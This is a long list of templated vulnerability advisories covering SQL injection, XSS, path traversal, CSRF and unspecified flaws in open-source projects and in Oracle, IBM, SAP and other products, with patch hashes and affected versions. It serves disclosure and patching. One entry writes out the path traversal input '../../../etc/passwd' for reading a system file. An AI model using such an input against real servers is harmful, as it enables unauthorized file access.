A vulnerability was found in nivit redports. It has been declared as critical. This vulnerability affects unknown code of the file redports-trac/redports/model.py. The manipulation leads to sql injection. The name of the patch is fc2c1ea1b8d795094abb15ac73cab90830534e04. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-218464.
A vulnerability, which was classified as critical, has been found in risheesh debutsav. This issue affects some unknown processing. The manipulation leads to sql injection. The patch is named 7a8430df79277c613449262201cc792db894fc76. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-218459.
A vulnerability has been found in frontaccounting faplanet and classified as critical. This vulnerability affects unknown code. The manipulation leads to path traversal. The patch is identified as a5dcd87f46080a624b1a9ad4b0dd035bbd24ac50. It is recommended to apply a patch to fix this issue. VDB-218398 is the identifier assigned to this vulnerability.
A vulnerability was found in agy pontifex.http. It has been declared as critical. This vulnerability affects unknown code of the file lib/Http.coffee. The manipulation leads to sql injection. Upgrading to version 0.1.0 is able to address this issue. The name of the patch is e52a758f96861dcef2dabfecb9da191bb2e07761. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-218356.
A vulnerability was found in yanheven console and classified as problematic. Affected by this issue is some unknown functionality of the file horizon/static/horizon/js/horizon.instances.js. The manipulation leads to cross site scripting. The attack may be launched remotely. The patch is identified as 32a7b713468161282f2ea01d5e2faff980d924cd. It is recommended to apply a patch to fix this issue. VDB-218354 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as critical, has been found in pointhi searx_stats. This issue affects some unknown processing of the file cgi/cron.php. The manipulation leads to sql injection. The patch is named 281bd679a4474ddb222d16c1c380f252839cc18f. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-218351.
A vulnerability was found in NoxxieNl Criminals. It has been classified as critical. Affected is an unknown function of the file ingame/roulette.php. The manipulation of the argument gambleMoney leads to sql injection. The patch is identified as 0a60b31271d4cbf8babe4be993d2a3a1617f0897. It is recommended to apply a patch to fix this issue. VDB-218022 is the identifier assigned to this vulnerability.
A vulnerability was found in Nayshlok Voyager. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file Voyager/src/models/DatabaseAccess.java. The manipulation leads to sql injection. The identifier of the patch is f1249f438cd8c39e7ef2f6c8f2ab76b239a02fae. It is recommended to apply a patch to fix this issue. The identifier VDB-218005 was assigned to this vulnerability.
A vulnerability classified as critical has been found in CherishSin klattr. This affects an unknown part. The manipulation leads to sql injection. The patch is named f8e4ecfbb83aef577011b0b4aebe96fb6ec557f1. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-217719.
A vulnerability was found in saxman maps-js-icoads. It has been classified as problematic. Affected is an unknown function. The manipulation leads to exposure of information through directory listing. It is possible to launch the attack remotely. The name of the patch is 34b8b0cce2807b119f4cffda2ac48fc8f427d69a. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-217644.
A vulnerability was found in saxman maps-js-icoads and classified as critical. This issue affects some unknown processing of the file http-server.js. The manipulation leads to path traversal. The patch is named 34b8b0cce2807b119f4cffda2ac48fc8f427d69a. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-217643.
A vulnerability classified as critical was found in corincerami curiosity. Affected by this vulnerability is an unknown functionality of the file app/controllers/image_controller.rb. The manipulation of the argument sol leads to sql injection. The patch is named d64fddd74ca72714e73f4efe24259ca05c8190eb. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-217639.
A vulnerability was found in emmflo yuko-bot. It has been declared as problematic. This vulnerability affects unknown code. The manipulation of the argument title leads to denial of service. The attack can be initiated remotely. The name of the patch is e580584b877934a4298d4dd0c497c79e579380d0. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-217636.
A vulnerability, which was classified as critical, was found in john5223 bottle-auth. Affected is an unknown function. The manipulation leads to sql injection. The name of the patch is 99cfbcc0c1429096e3479744223ffb4fda276875. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-217632.
A vulnerability was found in ada-l0velace Bid and classified as critical. This issue affects some unknown processing. The manipulation leads to sql injection. The identifier of the patch is abd71140b8219fa8741d0d8a57ab27d5bfd34222. It is recommended to apply a patch to fix this issue. The identifier VDB-217625 was assigned to this vulnerability.
A vulnerability classified as critical was found in ananich bitstorm. Affected by this vulnerability is an unknown functionality of the file announce.php. The manipulation of the argument event leads to sql injection. The identifier of the patch is ea8da92f94cdb78ee7831e1f7af6258473ab396a. It is recommended to apply a patch to fix this issue. The identifier VDB-217621 was assigned to this vulnerability.
A vulnerability was found in mrobit robitailletheknot. It has been classified as problematic. This affects an unknown part of the file app/filters.php of the component CSRF Token Handler. The manipulation of the argument _token leads to incorrect comparison. It is possible to initiate the attack remotely. The complexity of an attack is rather high. The exploitability is told to be difficult. The patch is named 6b2813696ccb88d0576dfb305122ee880eb36197. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-217599.
A vulnerability was found in Pylons horus and classified as problematic. Affected by this issue is some unknown functionality of the file horus/flows/local/services.py. The manipulation leads to observable timing discrepancy. The complexity of an attack is rather high. The exploitation is known to be difficult. The patch is identified as fd56ccb62ce3cbdab0484fe4f9c25c4eda6c57ec. It is recommended to apply a patch to fix this issue. VDB-217598 is the identifier assigned to this vulnerability.
A vulnerability classified as critical was found in koroket RedditOnRails. This vulnerability affects unknown code of the component Vote Handler. The manipulation leads to improper access controls. The attack can be initiated remotely. The patch is identified as 7f3c7407d95d532fcc342b00d68d0ea09ca71030. It is recommended to apply a patch to fix this issue. VDB-217594 is the identifier assigned to this vulnerability.
A vulnerability was found in Piwigo-Guest-Book up to 1.3.0. It has been declared as critical. This vulnerability affects unknown code of the file include/guestbook.inc.php of the component Navigation Bar. The manipulation of the argument start leads to sql injection. Upgrading to version 1.3.1 is able to address this issue. The patch is identified as 0cdd1c388edf15089c3a7541cefe7756e560581d. It is recommended to upgrade the affected component. VDB-217582 is the identifier assigned to this vulnerability.
A vulnerability was found in JervenBolleman sparql-identifiers and classified as critical. This issue affects some unknown processing of the file src/main/java/org/identifiers/db/RegistryDao.java. The manipulation leads to sql injection. The patch is named 44bb0db91c064e305b192fc73521d1dfd25bde52. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-217571.
A vulnerability was found in ScottTZhang voter-js and classified as critical. Affected by this issue is some unknown functionality of the file main.js. The manipulation leads to sql injection. The patch is identified as 6317c67a56061aeeaeed3cf9ec665fd9983d8044. It is recommended to apply a patch to fix this issue. VDB-217562 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as critical, has been found in kassi xingwall. This issue affects some unknown processing of the file app/controllers/oauth.js. The manipulation leads to session fixiation. The patch is named e9f0d509e1408743048e29d9c099d36e0e1f6ae7. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-217559.
A vulnerability classified as critical has been found in tbezman school-store. This affects an unknown part. The manipulation leads to sql injection. The identifier of the patch is 2957fc97054216d3a393f1775efd01ae2b072001. It is recommended to apply a patch to fix this issue. The identifier VDB-217557 was assigned to this vulnerability.
A vulnerability, which was classified as critical, was found in Seiji42 cub-scout-tracker. This affects an unknown part of the file databaseAccessFunctions.js. The manipulation leads to sql injection. The patch is named b4bc1a328b1f59437db159f9d136d9ed15707e31. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-217551.
A vulnerability, which was classified as critical, was found in soshtolsus wing-tight. This affects an unknown part of the file index.php. The manipulation of the argument p leads to file inclusion. It is possible to initiate the attack remotely. Upgrading to version 1.0.0 is able to address this issue. The patch is named 567bc33e6ed82b0d0179c9add707ac2b257aeaf2. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-217515.
A vulnerability classified as critical was found in Miccighel PR-CWT. This vulnerability affects unknown code. The manipulation leads to sql injection. The patch is identified as e412127d07004668e5a213932c94807d87067a1f. It is recommended to apply a patch to fix this issue. VDB-217486 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as problematic, has been found in kkokko NeoXplora. Affected by this issue is some unknown functionality of the component Trainer Handler. The manipulation leads to cross site scripting. The attack may be launched remotely. The name of the patch is dce1aecd6ee050a29f953ffd8f02f21c7c13f1e6. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-217352.
A vulnerability has been found in IS_Projecto2 and classified as critical. This vulnerability affects unknown code of the file Cnn-EJB/ejbModule/ejbs/NewsBean.java. The manipulation of the argument date leads to sql injection. The name of the patch is aa128b2c9c9fdcbbf5ecd82c1e92103573017fe0. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-217192.
A vulnerability, which was classified as critical, was found in License to Kill. This affects an unknown part of the file models/injury.rb. The manipulation of the argument name leads to sql injection. The patch is named cd11cf174f361c98e9b1b4c281aa7b77f46b5078. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-217191.
A vulnerability, which was classified as problematic, has been found in drybjed ansible-ntp. Affected by this issue is some unknown functionality of the file meta/main.yml. The manipulation leads to insufficient control of network message volume. The attack can only be done within the local network. The complexity of an attack is rather high. The exploitation is known to be difficult. The patch is identified as ed4ca2cf012677973c220cdba36b5c60bfa0260b. It is recommended to apply a patch to fix this issue. VDB-217190 is the identifier assigned to this vulnerability.
A vulnerability classified as problematic was found in Jobs-Plugin. Affected by this vulnerability is an unknown functionality. The manipulation leads to cross site scripting. The attack can be launched remotely. The identifier of the patch is b8a56718b1d42834c6ec51d9c489c5dc20471d7b. It is recommended to apply a patch to fix this issue. The identifier VDB-217189 was assigned to this vulnerability.
A vulnerability was found in rails-cv-app. It has been rated as problematic. Affected by this issue is some unknown functionality of the file app/controllers/uploaded_files_controller.rb. The manipulation with the input ../../../etc/passwd leads to path traversal: '../filedir'. The exploit has been disclosed to the public and may be used. The patch is identified as 0d20362af0a5f8a126f67c77833868908484a863. It is recommended to apply a patch to fix this issue. VDB-217178 is the identifier assigned to this vulnerability.
A vulnerability was found in porpeeranut go-with-me. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file module/frontend/add.php. The manipulation leads to sql injection. The identifier of the patch is b92451e4f9e85e26cf493c95ea0a69e354c35df9. It is recommended to apply a patch to fix this issue. The identifier VDB-217177 was assigned to this vulnerability.
A vulnerability was found in kirill2485 TekNet. It has been classified as problematic. Affected is an unknown function of the file pages/loggedin.php. The manipulation of the argument statusentery leads to cross site scripting. It is possible to launch the attack remotely. The name of the patch is 1c575340539f983333aa43fc58ecd76eb53e1816. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-217176.
A vulnerability, which was classified as critical, has been found in taoeffect Empress. Affected by this issue is some unknown functionality. The manipulation leads to use of hard-coded password. The patch is identified as 557e177d8a309d6f0f26de46efb38d43e000852d. It is recommended to apply a patch to fix this issue. VDB-217154 is the identifier assigned to this vulnerability.
A vulnerability was found in ttskch PaginationServiceProvider up to 0.x. It has been declared as critical. This vulnerability affects unknown code of the file demo/index.php of the component demo. The manipulation of the argument sort/id leads to sql injection. Upgrading to version 1.0.0 is able to address this issue. The patch is identified as 619de478efce17ece1a3b913ab16e40651e1ea7b. It is recommended to upgrade the affected component. VDB-217150 is the identifier assigned to this vulnerability.
A vulnerability was found in valtech IDP Test Client and classified as problematic. Affected by this issue is some unknown functionality of the file python-flask/main.py. The manipulation leads to cross-site request forgery. The attack may be launched remotely. The name of the patch is f1e7b3d431c8681ec46445557125890c14fa295f. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-217148.
A vulnerability classified as problematic was found in FFmpeg 2.0. Affected by this vulnerability is an unknown functionality of the component HEVC Video Decoder. The manipulation leads to memory corruption. The attack can be launched remotely. It is recommended to apply a patch to fix this issue.
A vulnerability was found in FFmpeg 2.0. It has been classified as problematic. Affected is an unknown function of the file libavcodec/dxtroy.c. The manipulation leads to integer coercion error. It is possible to launch the attack remotely. It is recommended to apply a patch to fix this issue.
Unspecified vulnerability in JetBrains TeamCity before 8.1 allows remote attackers to obtain sensitive information via unknown vectors.
Cross-site request forgery (CSRF) vulnerability in the Admin Web UI in IBM Lotus Protector for Mail Security 2.8.x before 2.8.1-22905 allows remote authenticated users to hijack the authentication of unspecified victims via unknown vectors.
Unspecified vulnerability in Jazz Team Server in IBM Rational Collaborative Lifecycle Management (CLM) 3.x before 3.0.1.6 iFix 2 and 4.x before 4.0.6 allows remote attackers to execute arbitrary code via unknown vectors.
Unspecified vulnerability in IBM Rational Requirements Composer 3.x before 3.0.1.6 iFix2 and 4.x before 4.0.6, and Rational DOORS Next Generation 4.x before 4.0.6, allows remote authenticated users to read arbitrary data via unknown vectors.
Unspecified vulnerability in Norman Security Suite 10.1 and earlier allows local users to gain privileges via unknown vectors.
Unspecified vulnerability in Juniper Junos before 11.4R10-S1, before 11.4R11, 12.1X44 before 12.1X44-D26, 12.1X44 before 12.1X44-D30, 12.1X45 before 12.1X45-D20, and 12.1X46 before 12.1X46-D10, when Dynamic IPsec VPN is configured, allows remote attackers to cause a denial of service (new Dynamic VPN connection failures and CPU and disk consumption) via unknown vectors.
Unspecified vulnerability in Novell Open Enterprise Server (OES) 11 SP1 before Scheduled Maintenance Update 9415 and 11 SP2 before Scheduled Maintenance Update 9413 for Linux has unknown impact and attack vectors.
Cross-site request forgery (CSRF) vulnerability in Adobe ColdFusion 9.0 before Update 13, 9.0.1 before Update 12, 9.0.2 before Update 7, 10 before Update 14, and 11 before Update 2 allows remote attackers to hijack the authentication of unspecified victims via unknown vectors.
Adobe Flash Player before 11.7.700.260 and 11.8.x and 11.9.x before 12.0.0.38 on Windows and Mac OS X and before 11.2.202.335 on Linux, Adobe AIR before 4.0.0.1390, Adobe AIR SDK before 4.0.0.1390, and Adobe AIR SDK &amp; Compiler before 4.0.0.1390 allow attackers to bypass unspecified protection mechanisms via unknown vectors.
Unspecified vulnerability in the Oracle OpenSSO component in Oracle Fusion Middleware 8.0 Update 2 Patch 5 allows remote authenticated users to affect integrity via unknown vectors related to Admin Console.
Unspecified vulnerability in Oracle Java SE 8 allows remote attackers to affect confidentiality via unknown vectors related to Scripting, a different vulnerability than CVE-2014-0463.
Unspecified vulnerability in Oracle Java SE 8 allows remote attackers to affect confidentiality via unknown vectors related to Scripting, a different vulnerability than CVE-2014-0464.
Unspecified vulnerability in OpenJDK 6 before 6b31 on Debian GNU/Linux and Ubuntu 12.04 LTS and 10.04 LTS has unknown impact and attack vectors, a different vulnerability than CVE-2014-2405.
Unspecified vulnerability in Oracle Java SE 6u71, 7u51, and 8, and Java SE Embedded 7u51, allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Libraries.
Unspecified vulnerability in Oracle Java SE 7u51 and 8, and Java SE Embedded 7u51, allows remote attackers to affect availability via unknown vectors related to 2D.
Unspecified vulnerability in Oracle Java SE 5.0u61, SE 6u71, 7u51, and 8; JRockit R27.8.1 and R28.3.1; and Java SE Embedded 7u51 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Libraries.
Unspecified vulnerability in Oracle Java SE 6u71, 7u51, and 8, and Java SE Embedded 7u51, allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Hotspot.
Unspecified vulnerability in Oracle Java SE 7u51 and 8, and Java SE Embedded 7u51, allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Libraries, a different vulnerability than CVE-2014-0432 and CVE-2014-2402.
Unspecified vulnerability in Oracle Java SE 7u51 and 8, and Java SE Embedded 7u51, allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Security.
Unspecified vulnerability in Oracle Java SE 5.0u61, 6u71, 7u51, and 8; JRockit R27.8.1 and R28.3.1; and Java SE Embedded 7u51 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Security.
Unspecified vulnerability in the Oracle WebCenter Portal component in Oracle Fusion Middleware 11.1.1.7 and 11.1.1.8 allows remote attackers to affect confidentiality via unknown vectors related to People Connection.
Unspecified vulnerability in Oracle Java SE 6u71, 7u51, and 8, and Java SE Embedded 7u51, allows remote attackers to affect confidentiality via unknown vectors related to Deployment.
Unspecified vulnerability in Oracle Java SE 7u51 and 8 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Deployment.
Unspecified vulnerability in Oracle Solaris 10 and 11.1 allows local users to affect availability via unknown vectors related to Kernel, a different vulnerability than CVE-2013-5876.
Unspecified vulnerability in Oracle Java SE 5.0u61, 6u71, 7u51, and 8, and Java SE Embedded 7u51, allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Libraries.
Unspecified vulnerability in the Oracle AutoVue Electro-Mechanical Professional component in Oracle Supply Chain Products Suite 20.1.1 allows remote authenticated users to affect confidentiality via unknown vectors related to Web General, a different vulnerability than CVE-2013-5868 and CVE-2013-5871.
Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools component in Oracle PeopleSoft Products 8.52 allows remote attackers to affect integrity via unknown vectors related to Security.
Unspecified vulnerability in Oracle Solaris 9, 10, and 11.1 allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Print Filter Utility.
Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools component in Oracle PeopleSoft Products 8.52 and 8.53 allows remote attackers to affect availability via unknown vectors related to Integration Broker.
Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools component in Oracle PeopleSoft Products 8.52 and 8.53 allows remote authenticated users to affect integrity via unknown vectors related to Report Distribution.
Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools component in Oracle PeopleSoft Products 8.52 and 8.53 allows remote authenticated users to affect confidentiality via unknown vectors related to Panel Processor.
Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.72 and earlier, 5.5.34 and earlier, and 5.6.14 and earlier allows remote authenticated users to affect availability via unknown vectors related to Optimizer.
Unspecified vulnerability in the Hyperion BI+ component in Oracle Hyperion 11.1.2.2 and 11.1.2.3 allows remote attackers to affect integrity via unknown vectors related to Web Analysis.
Unspecified vulnerability in the Oracle Transportation Management component in Oracle Supply Chain Products Suite 6.1, 6.2, 6.3, 6.3.1, and 6.3.2 allows remote authenticated users to affect availability via unknown vectors related to Data, Domain &amp; Function Security.
Unspecified vulnerability in the Oracle Agile Product Lifecycle Management for Process component in Oracle Supply Chain Products Suite 6.0, 6.1, and 6.1.1 allows remote attackers to affect integrity via unknown vectors related to Installation.
Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.6.13 and earlier allows remote attackers to affect availability via unknown vectors related to Thread Pooling.
Unspecified vulnerability in Oracle Java SE 7u51 and 8, and Java SE Embedded 7u51, allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Libraries, a different vulnerability than CVE-2014-0455 and CVE-2014-2402.
Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.6.14 and earlier allows remote authenticated users to affect availability via unknown vectors related to InnoDB, a different vulnerability than CVE-2013-5881.
Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.6.13 and earlier allows remote authenticated users to affect availability via unknown vectors related to Performance Schema.
Unspecified vulnerability in Oracle Java SE 5.0u61, 6u71, 7u51, and 8; JRockit R27.8.1 and R28.3.1; and Java SE Embedded 7u51 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to 2D.
Unspecified vulnerability in the PeopleSoft Enterprise SCM Services Procurement component in Oracle PeopleSoft Products 9.2 allows remote authenticated users to affect confidentiality via unknown vectors related to Security.
Unspecified vulnerability in Oracle Java SE 6u65 and 7u45 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Deployment, a different vulnerability than CVE-2013-5889, CVE-2013-5902, CVE-2014-0410, CVE-2014-0415, and CVE-2014-0418.
Unspecified vulnerability in Oracle Java SE 5.0u55, 6u65, and 7u45; JRockit R27.7.7 and R28.2.9; Java SE Embedded 7u45; and OpenJDK 7 allows remote authenticated users to affect confidentiality and availability via unknown vectors related to Beans.  NOTE: the previous information is from the January 2014 CPU. Oracle has not commented on third-party claims that this issue is an XML External Entity (XXE) vulnerability in DocumentHandler.java, related to Beans decoding.
Unspecified vulnerability in Oracle Solaris 10, when running on the SPARC64-X Platform, allows local users to affect confidentiality, integrity, and availability via unknown vectors.
Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.5.34 and earlier, and 5.6.14 and earlier, allows remote authenticated users to affect availability via unknown vectors related to Replication.
Unspecified vulnerability in the Oracle Secure Global Desktop (SGD) component in Oracle Virtualization SGD before 4.63 with December 2013 PSU, 4.71, 5.0 with December 2013 PSU, and 5.10 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Administration Console and Workspace Web Applications.
Unspecified vulnerability in Oracle Java SE 6u65 and 7u45 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Deployment, a different vulnerability than CVE-2013-5889, CVE-2013-5902, CVE-2014-0410, CVE-2014-0415, and CVE-2014-0424.
Unspecified vulnerability in Oracle Java SE 5.0u55, 6u65, and 7u45; JavaFX 2.2.45; and Java SE Embedded 7u45 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to 2D.
Unspecified vulnerability in Oracle Java SE 6u65 and 7u45 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Deployment, a different vulnerability than CVE-2013-5889, CVE-2013-5902, CVE-2014-0410, CVE-2014-0418, and CVE-2014-0424.
Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.72 and earlier, 5.5.34 and earlier, and 5.6.14 and earlier allows remote authenticated users to affect availability via unknown vectors related to InnoDB.
Unspecified vulnerability in Oracle Java SE 6u65 and 7u45 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Deployment, a different vulnerability than CVE-2013-5889, CVE-2013-5902, CVE-2014-0415, CVE-2014-0418, and CVE-2014-0424.
Unspecified vulnerability in Oracle Java SE 7u45, when running on OS X, allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Hotspot.
Unspecified vulnerability in the Oracle VM VirtualBox component in Oracle Virtualization VirtualBox prior to 3.2.20, 4.0.22, 4.1.30, 4.2.20, and 4.3.4 allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Core, a different vulnerability than CVE-2014-0405.
Unspecified vulnerability in the Oracle VM VirtualBox component in Oracle Virtualization VirtualBox prior to 3.2.20, 4.0.22, 4.1.30, 4.2.20, and 4.3.4 allows local users to affect integrity and availability via unknown vectors related to Core, a different vulnerability than CVE-2014-0404.
Unspecified vulnerability in the Oracle VM VirtualBox component in Oracle Virtualization VirtualBox prior to 3.2.20, 4.0.22, 4.1.30, 4.2.20, and 4.3.4 allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Core, a different vulnerability than CVE-2014-0407.
Unspecified vulnerability in the Oracle VM VirtualBox component in Oracle Virtualization VirtualBox prior to 3.2.20, 4.0.22, 4.1.30, 4.2.20, and 4.3.4 allows local users to affect integrity and availability via unknown vectors related to Core, a different vulnerability than CVE-2014-0406.
Unspecified vulnerability in Oracle Java SE 6u65 and 7u45 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Deployment, a different vulnerability than CVE-2013-5898 and CVE-2014-0375.
Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.71 and earlier, 5.5.33 and earlier, and 5.6.13 and earlier allows remote authenticated users to affect availability via unknown vectors related to Locking.
Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.72 and earlier, 5.5.34 and earlier, and 5.6.14 and earlier allows remote authenticated users to affect availability via unknown vectors.
Unspecified vulnerability in the Oracle Transportation Management component in Oracle Supply Chain Products Suite 6.2, 6.3, 6.3.1, and 6.3.2 allows remote authenticated users to affect confidentiality via unknown vectors related to Data, Domain &amp; Function Security.
Unspecified vulnerability in the Oracle Application Object Library component in Oracle E-Business Suite 11.5.10.2, 12.0.6, 12.1.3, and 12.2.2 allows remote attackers to affect confidentiality via unknown vectors related to Discoverer.
Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools component in Oracle PeopleSoft Products 8.52 and 8.53 allows remote attackers to affect confidentiality via unknown vectors related to Portal - Web Services.
Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools component in Oracle PeopleSoft Products 8.52 and 8.53 allows remote attackers to affect confidentiality via unknown vectors related to Updates Environment Mgmt, a different vulnerability than CVE-2014-0394.
Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools component in Oracle PeopleSoft Products 8.52 and 8.53 allows remote attackers to affect confidentiality via unknown vectors related to Updates Environment Mgmt, a different vulnerability than CVE-2014-0395.
Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.71 and earlier, 5.5.33 and earlier, and 5.6.13 and earlier allows remote authenticated users to affect integrity via unknown vectors related to InnoDB.
Unspecified vulnerability in the PeopleSoft Enterprise HRMS component in Oracle PeopleSoft Products 9.1 and 9.2 allows remote authenticated users to affect confidentiality via unknown vectors related to Security.
Unspecified vulnerability in the Oracle Identity Manager component in Oracle Fusion Middleware 11.1.1.5, 11.1.1.7, 11.1.2.0, and 11.1.2.1 allows remote attackers to affect confidentiality via unknown vectors related to End User Self Service.
Unspecified vulnerability in Oracle Solaris 10 allows remote attackers to affect integrity via unknown vectors related to Java Web Console.
Unspecified vulnerability in Oracle iLearning 6.0 allows remote attackers to affect integrity via unknown vectors related to Learner Pages.
Unspecified vulnerability in the PeopleSoft Enterprise HRMS Human Resources component in Oracle PeopleSoft Products 9.1 and 9.2 allows remote authenticated users to affect confidentiality via unknown vectors related to Org and Workforce Dev.
Unspecified vulnerability in Oracle Java SE 6u65 and Java SE 7u45, when running on Firefox, allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Deployment.
Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.71 and earlier, 5.5.33 and earlier, and 5.6.13 and earlier allows remote authenticated users to affect availability via unknown vectors related to Optimizer.
Unspecified vulnerability in Oracle Java SE 7u45, when installing on OS X, allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Install.
Unspecified vulnerability in the Oracle Identity Manager component in Oracle Fusion Middleware 11.1.2.0 and 11.1.2.1 allows remote authenticated users to affect confidentiality via unknown vectors related to Identity Console.
Unspecified vulnerability in Oracle Java SE 7u45 and JavaFX 2.2.45 allows remote attackers to affect availability via unknown vectors related to JavaFX.
Unspecified vulnerability in the Oracle Demantra Demand Management component in Oracle Supply Chain Products Suite 7.2.0.3 SQL-Server, 7.3.0.x, 7.3.1.x, 12.2.0, 12.2.1, and 12.2.2 allows remote attackers to affect integrity via unknown vectors related to DM Others.
Unspecified vulnerability in the Spatial component in Oracle Database Server 11.1.0.7, 11.2.0.3, 11.2.0.4, and 12.1.0.1 allows local users to affect confidentiality, integrity, and availability via unknown vectors.
Unspecified vulnerability in Oracle Java SE 6u65 and 7u45 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Deployment, a different vulnerability than CVE-2013-5898 and CVE-2014-0403.
Unspecified vulnerability in the Oracle Portal component in Oracle Fusion Middleware 11.1.1.6 allows remote attackers to affect integrity via unknown vectors related to Page Parameters and Events.
Unspecified vulnerability in Oracle Java SE 5.0u55, 6u65, and 7u45, and OpenJDK 7, allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Serviceability.  NOTE: the previous information is from the January 2014 CPU. Oracle has not commented on third-party claims that the issue is related to throwing of an incorrect exception when SnmpStatusException should have been used in the SNMP implementation, which allows attackers to escape the sandbox.
Unspecified vulnerability in the Oracle Demantra Demand Management component in Oracle Supply Chain Products Suite 7.2.0.3 SQL-Server, 7.3.0, 7.3.1, 12.2.1, and 12.2.2 allows remote authenticated users to affect confidentiality and integrity via unknown vectors related to DM Others.
Unspecified vulnerability in the Oracle Demantra Demand Management component in Oracle Supply Chain Products Suite 7.2.0.3 SQL-Server, 7.3.0.x, 7.3.1.x, 12.2.0, 12.2.1, and 12.2.2 allows remote authenticated users to affect integrity via unknown vectors related to DM Others.
Unspecified vulnerability in the Siebel Life Sciences component in Oracle Siebel CRM 8.1.1 and 8.2.2 allows remote authenticated users to affect availability via unknown vectors related to Clinical Trip Report.
Unspecified vulnerability in the Siebel Core - EAI component in Oracle Siebel CRM 8.1.1 and 8.2.2 allows remote attackers to affect confidentiality via unknown vectors related to Java Integration, a different vulnerability than CVE-2015-0366.
Unspecified vulnerability in Oracle Java SE 5.0u55, 6u65, and 7u45, and Java SE Embedded 7u45, allows remote attackers to affect confidentiality via unknown vectors related to Networking.  NOTE: the previous information is from the January 2014 CPU. Oracle has not commented on third-party claims that the issue is related to incorrect permission checks when listening on a socket, which allows attackers to escape the sandbox.
Unspecified vulnerability in the Hyperion Essbase Administration Services component in Oracle Hyperion 11.1.2.1, 11.1.2.2, and 11.1.2.3 allows remote authenticated users to affect confidentiality and integrity via unknown vectors related to Admin Console.
Unspecified vulnerability in the Oracle Applications Framework component in Oracle E-Business Suite 11.5.10.2, 12.0.6, 12.1.3, and 12.2.2 allows remote authenticated users to affect confidentiality via unknown vectors related to Attachments.
Cross-site request forgery (CSRF) vulnerability in the MRBS module for Drupal allows remote attackers to hijack the authentication of unspecified victims via unknown vectors.
SQL injection vulnerability in an unspecified DLL in the FSDBCom ActiveX control in F-Secure Anti-Virus for Microsoft Exchange Server before HF02, Anti-Virus for Windows Servers 9.00 before HF09, Anti-Virus for Citrix Servers 9.00 before HF09, and F-Secure Email and Server Security and F-Secure Server Security 9.20 before HF01 allows remote attackers to execute arbitrary SQL commands via unknown vectors, related to GetCommand.
An unspecified J2EE core service in the J2EE Engine in SAP NetWeaver does not properly restrict access, which allows remote attackers to read and write to arbitrary files via unknown vectors.
An unspecified RFC function in SAP CCMS Agent allows remote attackers to execute arbitrary commands via unknown vectors.
Unspecified vulnerability in SAP adminadapter allows remote attackers to read or write to arbitrary files via unknown vectors.
Unspecified vulnerability in SAP Mobile Infrastructure allows remote attackers to obtain sensitive port information via unknown vectors, related to an "internal port scanning" issue.
Unspecified vulnerability in SAP Guided Procedures Archive Monitor allows remote attackers to obtain usernames, roles, profiles, and possibly other identity information via unknown vectors.
